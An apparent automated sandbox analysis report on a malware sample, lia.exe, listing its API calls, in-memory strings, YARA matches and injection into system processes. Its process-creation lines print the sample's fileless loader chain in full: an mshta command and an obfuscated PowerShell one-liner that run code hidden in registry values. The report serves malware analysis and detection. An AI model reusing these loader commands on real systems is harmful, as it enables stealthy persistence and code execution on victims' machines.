Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg |
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/ |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp | String found in binary or memory: http://twitter.com/spotifyg |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B16DD3 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B17F60 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B16B67 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E63BC |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EA241 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D95FE |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EF1EE |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D9D64 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DC086 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D34DC |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E78F1 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D504A |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054AB44 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054B58C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005386D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00549858 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00532804 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053A808 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053B008 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548820 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00538024 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00535828 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005268FC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005340E8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00523890 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00524080 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00545954 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052B154 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053194B |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005231D4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00536190 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005352CC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005212BC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00542330 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00537BFC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00542BA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00523BA4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053BC10 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052C49C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005344B4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052DCA8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053CCA8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00530544 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00547D6C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053751C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00544530 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00529DF0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054C588 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548DA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00531618 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00543E2C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052A6D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00547EA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00539740 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052CF44 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053FF4C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00527F64 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005437D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548FA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F86D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F480AB44 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4808820 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E3BA4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4809858 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4802BA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4808FA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F5828 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F8024 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F48037D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FBC10 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00401ABC NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B160A0 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B15D85 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B1231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B18185 NtQueryVirtualMemory, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DD317 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039ECEED GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F1AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DD274 NtQueryInformationProcess, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D8C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D3F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E0B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D1641 memset,NtQueryInformationProcess, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D155B NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F389B NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EE4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00526140 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00539994 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00521B84 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00540E70 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052E614 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052FF60 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00521FBC NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0055F003 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FAC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BD274 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D1AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B1641 memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036C7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036B155B NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CE4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: unknown | Process created: C:\Users\user\Desktop\lia.exe "C:\Users\user\Desktop\lia.exe" |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP" |
Source: C:\Users\user\Desktop\lia.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline |
